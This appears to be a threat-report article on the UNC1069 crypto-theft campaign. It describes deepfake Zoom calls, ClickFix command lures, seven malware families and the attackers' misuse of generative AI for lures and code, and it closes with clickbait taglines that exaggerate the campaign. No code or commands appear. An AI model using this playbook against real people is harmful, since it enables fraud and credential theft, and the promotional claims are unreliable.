North Korean Hackers UNC1069 Unleash AI-Powered Crypto Heist: Deepfakes, ClickFix, and 7 New Malware Strains Target Industry

In a chilling demonstration of how artificial intelligence is reshaping cybercrime, North Korea-linked threat actors have launched an unprecedented cryptocurrency theft campaign combining deepfake video lures, sophisticated social engineering, and a staggering arsenal of seven unique malware families. The operation, attributed to UNC1069 (also known as CryptoCore and MASAN), represents one of the most technically advanced crypto heists ever documented.

The Perfect Storm: AI Meets Social Engineering

The attack begins with what appears to be a legitimate business opportunity. Victims—typically cryptocurrency startup founders, software developers, and venture capital professionals—receive messages via Telegram from accounts impersonating reputable venture capitalists. In some cases, attackers have even compromised legitimate entrepreneur accounts to lend authenticity to their approach.

Once contact is established, victims are directed to schedule meetings through Calendly, setting up what they believe will be a standard 30-minute video conference. However, the meeting link redirects to a meticulously crafted fake Zoom website (“zoom.uswe05[.]us”), where victims encounter a sophisticated deepfake video interface.

Deepfake Deception at Scale

The fake video call interface mirrors Zoom’s authentic appearance, complete with prompts to enable cameras and enter names. What victims don’t realize is that they’re watching either AI-generated deepfakes or recordings stolen from previous victims who unknowingly had their webcam footage captured during earlier attacks. This recycled footage creates an illusion of a live conversation, making the deception nearly impossible to detect.

When the pre-recorded video ends, the interface smoothly transitions to display the victim’s own profile image, maintaining the illusion of an active call. The sophistication of this approach has earned the campaign the moniker “GhostCall” from researchers at Kaspersky, who documented similar tactics in October 2025.

ClickFix: The Gateway to Compromise

The attack’s second phase exploits the ClickFix infection vector—a technique that tricks users into executing malicious commands under the guise of troubleshooting. When victims encounter a fake audio error message during the supposed video call, they’re prompted to run a “troubleshooting command” that appears legitimate.

For macOS systems, this command executes an AppleScript that drops a malicious Mach-O binary called WAVESHAPER. This C++ executable serves as the initial foothold, gathering system information and deploying a Go-based downloader named HYPERCALL, which becomes the delivery mechanism for the campaign’s extensive malware arsenal.

Seven Malware Families: An Unprecedented Arsenal

What makes this campaign particularly alarming is the deployment of seven distinct malware families, including several never-before-seen variants:

WAVESHAPER – The initial C++ dropper that establishes the beachhead and deploys HYPERCALL.

HYPERCALL – A Go-based downloader that serves as the primary distribution mechanism for subsequent payloads.

HIDDENCALL – A Golang backdoor providing hands-on keyboard access to compromised systems.

DEEPBREATH – A Swift-based data miner that manipulates macOS’s Transparency, Consent, and Control (TCC) database to bypass security restrictions.

SUGARLOADER – A C++ downloader that deploys CHROMEPUSH and other payloads.

CHROMEPUSH – A C++ data stealer deployed as a browser extension masquerading as an offline Google Docs editor.

SILENCELIFT – A minimalist C/C++ backdoor that communicates with command-and-control servers.

DEEPBREATH: The Ultimate Data Thief

DEEPBREATH represents the campaign’s most sophisticated component. By manipulating macOS’s TCC database, it gains unauthorized file system access to extract highly sensitive information including iCloud Keychain credentials, browser data from Chrome, Brave, and Edge, Telegram conversations, and Apple Notes content.

The malware’s ability to bypass macOS security mechanisms demonstrates UNC1069’s deep understanding of Apple’s security architecture and their capability to develop custom solutions for circumventing protections.

CHROMEPUSH: Browser Espionage Redefined

CHROMEPUSH takes browser-based attacks to new heights by deploying as a malicious extension that appears to be a legitimate offline document editing tool. Once installed, it records keystrokes, observes username and password inputs, and extracts browser cookies—providing attackers with comprehensive access to victims’ online accounts.

The extension’s ability to operate across multiple browsers (Chrome, Brave, and Edge) maximizes its potential for data theft and account compromise.

The Bigger Picture: AI-Enhanced Cybercrime

This campaign exemplifies how artificial intelligence is transforming cybercrime. UNC1069 has been using generative AI tools like Google’s Gemini since at least 2023 to produce lure material, craft convincing messaging, and generate deepfake content. The group has even attempted to misuse AI for cryptocurrency theft code development, demonstrating their commitment to leveraging emerging technologies.

The use of AI extends beyond just deepfakes. The entire social engineering framework—from initial contact to meeting scheduling to the fake video interface—appears to be orchestrated using AI-generated content and automated systems, allowing the attackers to scale their operations while maintaining convincing authenticity.

Financial Motivation and Strategic Targeting

UNC1069’s shift from traditional finance to the cryptocurrency sector reflects the growing value and relative security vulnerabilities in the Web3 space. By targeting centralized exchanges, financial software developers, high-tech companies, and venture capital firms, the group positions itself to access not just individual cryptocurrency holdings but potentially entire exchange infrastructure and investment portfolios.

The deployment of multiple new malware families alongside established tools like SUGARLOADER indicates a significant expansion in the group’s capabilities and resources. This suggests either increased funding from North Korean state sources or successful monetization of previous campaigns.

Technical Sophistication Meets Operational Scale

The sheer volume of tooling deployed on single hosts—up to seven different malware families—demonstrates UNC1069’s determination to harvest every possible credential, browser data point, and session token. This comprehensive approach maximizes the potential for financial theft while minimizing the risk of missing critical access points.

The campaign’s infrastructure includes compromised Telegram accounts, fake Zoom websites, Calendly scheduling integration, and multiple command-and-control servers, creating a complex ecosystem that’s difficult to dismantle and easy to replicate.

Industry Response and Mitigation

Security researchers emphasize that this campaign represents a new paradigm in cryptocurrency-related cybercrime. The combination of AI-generated content, deepfake technology, and multiple malware delivery mechanisms creates a threat that traditional security measures struggle to address.

Organizations in the cryptocurrency sector are advised to implement strict verification procedures for video meetings, educate employees about ClickFix-style attacks, and deploy advanced endpoint detection solutions capable of identifying the diverse malware families used in this campaign.

The Future of AI-Powered Cybercrime

UNC1069’s campaign serves as a wake-up call for the entire cybersecurity industry. As artificial intelligence tools become more accessible and sophisticated, we can expect to see an escalation in AI-enhanced attacks that combine convincing social engineering with technical complexity.

The success of this operation suggests that other threat actors are likely studying and replicating these techniques, potentially leading to a new wave of AI-powered cybercrime targeting not just cryptocurrency but all sectors of the digital economy.

Tags: #UNC1069 #CryptoCore #MASAN #NorthKorea #AIHacking #DeepfakeAttacks #ClickFix #CryptocurrencyTheft #Malware #CyberCrime #GhostCall #SocialEngineering #AI #ArtificialIntelligence #CyberSecurity #DataBreach #FinancialTheft #MacOSMalware #WindowsMalware #APT #AdvancedPersistentThreat

Viral Sentences: “AI-powered deepfake crypto heist shakes industry to its core” “North Korean hackers deploy 7 malware strains in unprecedented attack” “ClickFix meets deepfake: The new face of cryptocurrency theft” “UNC1069’s AI arsenal redefines cybercrime sophistication” “GhostCall campaign exposes terrifying future of social engineering” “Cryptocurrency sector under siege from AI-enhanced North Korean hackers” “Seven malware families, one devastating crypto heist” “The deepfake video call that stole millions” “AI-generated lures and deepfake deception: UNC1069’s winning formula” “Cryptocurrency startups targeted in most sophisticated heist ever documented”

,